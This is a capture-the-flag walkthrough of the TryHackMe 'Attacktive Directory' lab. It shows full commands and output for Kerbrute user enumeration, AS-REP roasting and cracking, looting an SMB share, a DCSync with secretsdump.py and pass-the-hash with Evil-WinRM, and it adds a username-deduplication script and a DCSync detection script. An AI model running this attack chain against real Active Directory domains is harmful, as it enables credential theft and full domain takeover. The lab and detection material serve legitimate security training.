
Attacktive Directory THM{}

Setup

Installing Impacket

The SecureAuthCorp repository now redirects to fortra/impacket. On Kali the example scripts are also packaged under /usr/share/doc/python3-impacket/examples/, which is the path the commands further down use.

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

Installing Bloodhound and Neo4j

apt install bloodhound neo4j

Process

  1. Enumerate with Nmap

The relevant part of the scan output (the full AD domain is spookysec.local):

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos

3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-04T09:53:32+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-04T09:53:25+00:00
  2. Enumerate 139/445 with enum4linux

enum4linux -a <IP>
  3. Enumerate users via Kerberos

Kerberos is the main authentication service in Active Directory, and with port 88 open we can use Kerbrute to enumerate valid usernames, brute-force one user's password, or password-spray. Kerbrute's userenum sends AS-REQs without pre-authentication: the KDC answers KDC_ERR_PREAUTH_REQUIRED for an account that exists and KDC_ERR_C_PRINCIPAL_UNKNOWN for one that does not, so usernames are confirmed without guessing a single password and without touching lockout counters. To install Kerbrute, see: https://bhichher.medium.com/user-enumeration-using-kerbrute-tool-5154a252f6a4

To enumerate usernames the domain (-d) and the KDC to query (--dc) must be given. We pass spookysec.local for both, and Kali has no DNS for the lab, so spookysec.local must first be added to /etc/hosts pointing at the target IP.

./kerbrute userenum --dc spookysec.local -d spookysec.local /home/kali/THM/wind/userlist.txt -t 100


Version: dev (n/a) - 03/05/22 - Ronnie Flathers @ropnop

2022/03/05 03:47:14 > Using KDC(s):
2022/03/05 03:47:14 > spookysec.local:88

2022/03/05 03:47:14 > [+] VALID USERNAME: james@spookysec.local
2022/03/05 03:47:14 > [+] VALID USERNAME: svc-admin@spookysec.local
2022/03/05 03:47:15 > [+] VALID USERNAME: James@spookysec.local
2022/03/05 03:47:15 > [+] VALID USERNAME: robin@spookysec.local
2022/03/05 03:47:16 > [+] VALID USERNAME: darkstar@spookysec.local
2022/03/05 03:47:16 > [+] VALID USERNAME: administrator@spookysec.local
2022/03/05 03:47:18 > [+] VALID USERNAME: backup@spookysec.local
2022/03/05 03:47:18 > [+] VALID USERNAME: paradox@spookysec.local
2022/03/05 03:47:22 > [+] VALID USERNAME: JAMES@spookysec.local
2022/03/05 03:47:23 > [+] VALID USERNAME: Robin@spookysec.local
2022/03/05 03:47:30 > [+] VALID USERNAME: Administrator@spookysec.local
2022/03/05 03:47:44 > [+] VALID USERNAME: Darkstar@spookysec.local
2022/03/05 03:47:49 > [+] VALID USERNAME: Paradox@spookysec.local
2022/03/05 03:48:05 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2022/03/05 03:48:10 > [+] VALID USERNAME: ori@spookysec.local
2022/03/05 03:48:19 > [+] VALID USERNAME: ROBIN@spookysec.local
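Kerberos principal names are matched case-insensitively, so the james/James/JAMES hits above are one account; Kerbrute simply reports each spelling that appears in the wordlist. The following script, an added example that is not part of the original write-up or of Kerbrute, parses the userenum output and reduces it to one entry per account, which is the list you would hand to GetNPUsers.py -usersfile in the next step. The sample output embedded in it is constructed to mirror the run above.

```python
"""Reduce kerbrute userenum output to one entry per account.

Added example (not from the write-up or kerbrute).  Parses the
"[+] VALID USERNAME: user@realm" lines kerbrute prints and folds
case variants, since AD/Kerberos account names are case-insensitive.
"""
import re
import sys

# One kerbrute hit: "... > [+] VALID USERNAME: james@spookysec.local"
VALID_RE = re.compile(r"\[\+\] VALID USERNAME:\s+(?P<user>[^@\s]+)@(?P<realm>\S+)")


def parse_valid_users(output: str) -> list:
    """Unique sAMAccountNames (lower-cased), in first-seen order."""
    seen = {}  # dict keeps insertion order and dedupes in one go
    for line in output.splitlines():
        m = VALID_RE.search(line)
        if m:
            seen.setdefault(m.group("user").lower(), None)
    return list(seen)


def count_case_duplicates(output: str) -> int:
    """How many hits were only case variants of an account already seen."""
    hits = [m.group("user") for m in VALID_RE.finditer(output)]
    return len(hits) - len({h.lower() for h in hits})


# Constructed sample shaped like the kerbrute run on this page.
SAMPLE = """\
2022/03/05 03:47:14 > Using KDC(s):
2022/03/05 03:47:14 > spookysec.local:88
2022/03/05 03:47:14 > [+] VALID USERNAME: james@spookysec.local
2022/03/05 03:47:14 > [+] VALID USERNAME: svc-admin@spookysec.local
2022/03/05 03:47:15 > [+] VALID USERNAME: James@spookysec.local
2022/03/05 03:47:16 > [+] VALID USERNAME: administrator@spookysec.local
2022/03/05 03:47:22 > [+] VALID USERNAME: JAMES@spookysec.local
2022/03/05 03:47:30 > [+] VALID USERNAME: Administrator@spookysec.local
2022/03/05 03:48:10 > [+] VALID USERNAME: ori@spookysec.local
"""

if __name__ == "__main__":
    # Usage: python3 dedupe.py kerbrute.log > users.txt   (no file: use SAMPLE)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for user in parse_valid_users(text):
        print(user)  # one name per line, ready for GetNPUsers.py -usersfile
```

Redirect kerbrute's stdout to a file and pass it as the first argument; the script prints one account per line.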
  4. AS-REP Roasting

An account with "Do not require Kerberos preauthentication" set receives an AS-REP from the KDC without proving anything first. The enc-part of that reply is encrypted with a key derived from the account's password, so it can be taken offline and attacked with a wordlist. GetNPUsers.py from Impacket requests it for us; here we ask for svc-admin, found by Kerbrute above (with -usersfile the script tries every enumerated user at once).
sudo find / -type f -name 'GetNPUsers.py'

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:57b172a9aa785d8252a3509e7208d175$df011d8e21e10b0781783c9f625bc1b61cfed91037e4db5912f5eeba300401154a276108d3c12c364b1ed42e7c4243dd1607ed2a2a5ac5b47d1c586511d7a3a71b0e62aec0719b6fe4a12a7568f1aa1d491e07a8a46c40e65159565d655ff33c33a0d305d8a177272fb9d37811bd39942a764b4247f990878d62a2d85e82f08bf84332c531c4be2c90ab970bba9d0edbaf1ffbdb347d82b675c3ee2a55b2ec65f9e39b06acf502364aa3fe45751b8cefb6cbb0ad583e97bef5d4fa48ed61af5f468b1b8dbc277329e1fc2e53f9d84f4696b7907fe77a31d40dc4025e95a7346988ab487efbf711ac967bda862e9fecd0d922

The output line is in hashcat's format (the hashcat mode list gives 18200, Kerberos 5 AS-REP etype 23). John's krb5asrep format accepts the same line, so we save it to a file and run john with rockyou:

john svc-adminhash --wordlist=/usr/share/wordlists/rockyou.txt

# management2005 ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)
  5. Enumerate SMB shares with the cracked credentials

Now that we have a domain user's credentials, we can list the shares with smbclient:
smbclient -U=svc-admin%management2005 -L //10.10.251.19  

Sharename   Type   Comment
---------   ----   -------
ADMIN$      Disk   Remote Admin
backup      Disk
C$          Disk   Default share
IPC$        IPC    Remote IPC
NETLOGON    Disk   Logon server share
SYSVOL      Disk   Logon server share

Now we test access to each share; the non-default one, backup, is readable:

smbclient -U=svc-admin%management2005 //10.10.251.19/backup

smb: \> dir
. D 0 Sat Apr 4 15:08:39 2020
.. D 0 Sat Apr 4 15:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020

backup_credentials.txt is 48 bytes and holds a single base64 string (48 base64 characters decode to exactly the 36 bytes of the line below). After downloading it with get and base64-decoding it, we obtain:

backup@spookysec.local:backup2517860
  6. Elevating privileges within the domain

The decoded credentials belong to the backup account. We log in with them over RDP (3389, seen in the Nmap scan):
xfreerdp /v:10.10.251.19 /u:backup /p:backup2517860

The backup account is unusual: it holds the replication rights a domain controller uses to sync Active Directory changes, including password hashes, namely the extended rights "Replicating Directory Changes" and "Replicating Directory Changes All" on the domain object (both are needed; BloodHound, installed in Setup, shows this as a DCSync edge from the user to the domain). We can confirm it from the RDP session:

1. Open Active Directory Users and Computers.
2. From the View menu, select Advanced Features.
3. Right-click the domain object and select Properties.
4. Click the Security tab.
5. Select the backup user and check that "Replicating Directory Changes" and "Replicating Directory Changes All" are allowed.

Because of that, Impacket's secretsdump.py can impersonate a domain controller over DRSUAPI (the replication RPC interface, i.e. a DCSync) and pull every account's hashes out of NTDS.DIT without ever touching the file on disk. With the Administrator hash we effectively control the whole AD domain.

sudo find / -type f -name 'secretsdump.py'

# /usr/share/doc/python3-impacket/examples/secretsdump.py

Now we use secretsdump.py

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py backup:backup2517860@spookysec.local

# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
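The defender's side of this step, as an added example that is not from the write-up: each DRSUAPI replication request secretsdump.py makes is logged on the DC as Security event 4662 (when Directory Service Access auditing is enabled) with the replication extended-right GUIDs in the Properties field. Only domain-controller machine accounts should exercise those rights, so a 4662 carrying them from any other subject is a DCSync. The records below are constructed dictionaries with the 4662 fields the check needs; the DC inventory (ATTACKTIVEDIREC$) is an assumption for this lab, and a real deployment would feed parsed EVTX events and its own DC list.

```python
"""Flag DCSync in Security event 4662 records.

Added example (not from the write-up): the detection counterpart of the
secretsdump.py step.  Sample events are constructed; DC inventory assumed.
"""

# Extended rights that permit directory replication (control-access GUIDs).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL,
                      DS_REPL_GET_CHANGES_FILTERED}

CONTROL_ACCESS = 0x100  # AccessMask bit for "control access" (extended right)
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS object class

# Assumed inventory: machine accounts of the domain controllers (one in this lab).
DC_ACCOUNTS = {"ATTACKTIVEDIREC$"}


def replication_rights_in(properties: str) -> set:
    """Which replication GUIDs appear in a 4662 Properties field."""
    props = properties.lower()
    return {g for g in REPLICATION_RIGHTS if g in props}


def is_dcsync(event: dict) -> bool:
    """True when a subject that is not a DC exercised a replication right."""
    if event.get("EventID") != 4662:
        return False
    if not int(str(event.get("AccessMask", "0")), 16) & CONTROL_ACCESS:
        return False
    if not replication_rights_in(event.get("Properties", "")):
        return False
    return event.get("SubjectUserName", "").upper() not in DC_ACCOUNTS


def find_dcsync(events) -> list:
    return [e for e in events if is_dcsync(e)]


# Constructed sample records (field names as in the 4662 event XML).
SAMPLE_EVENTS = [
    {   # DC-to-DC replication: expected, not flagged
        "EventID": 4662, "SubjectUserName": "ATTACKTIVEDIREC$", "SubjectDomainName": "THM-AD",
        "AccessMask": "0x100",
        "Properties": "{%s}\n{%s}\n{%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DOMAIN_DNS_CLASS),
    },
    {   # backup running secretsdump.py: flagged
        "EventID": 4662, "SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
        "AccessMask": "0x100",
        "Properties": "{%s}\n{%s}\n{%s}" % (DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DOMAIN_DNS_CLASS),
    },
    {   # ordinary attribute read by the same user: not flagged
        "EventID": 4662, "SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
        "AccessMask": "0x10", "Properties": "{%s}" % DOMAIN_DNS_CLASS,
    },
    {   # a logon event: ignored
        "EventID": 4624, "SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
    },
]

if __name__ == "__main__":
    for e in find_dcsync(SAMPLE_EVENTS):
        rights = sorted(replication_rights_in(e["Properties"]))
        print(f"DCSync by {e['SubjectDomainName']}\\{e['SubjectUserName']}: {rights}")
```

The AccessMask test matters: the same Properties GUIDs show up on plain reads of the domain object, and only the control-access bit indicates the extended right was actually exercised.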

One of the hashes belongs to the built-in Administrator account (RID 500). NTLM authentication proves knowledge of the NT hash, not of the password itself, so the hash can be used as-is to authenticate: pass the hash.

  7. Pass the hash

We use Evil-WinRM, which authenticates over WinRM with -H (an NT hash) instead of a password. To install it from source (the README's second method):

Step 1. Install dependencies manually: sudo gem install winrm winrm-fs stringio logger fileutils
Step 2. Clone the repo: git clone https://github.com/Hackplayers/evil-winrm.git
Step 3. Ready. Just launch it (note that the lab IP differs from the earlier commands; use whatever address your instance has):

cd evil-winrm && ruby evil-winrm.rb -i 10.10.169.166 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc


# Evil-WinRM shell v3.3

# Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

# Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

# Info: Establishing connection to remote endpoint

# *Evil-WinRM* PS C:\Users\Administrator\Documents>

And we obtain the flags from each user's Desktop folder: svc-admin through the cracked password (the AS-REP requested with GetNPUsers.py after Kerbrute enumerated the user), backup through the credentials in the SMB share's text file, and Administrator through pass the hash.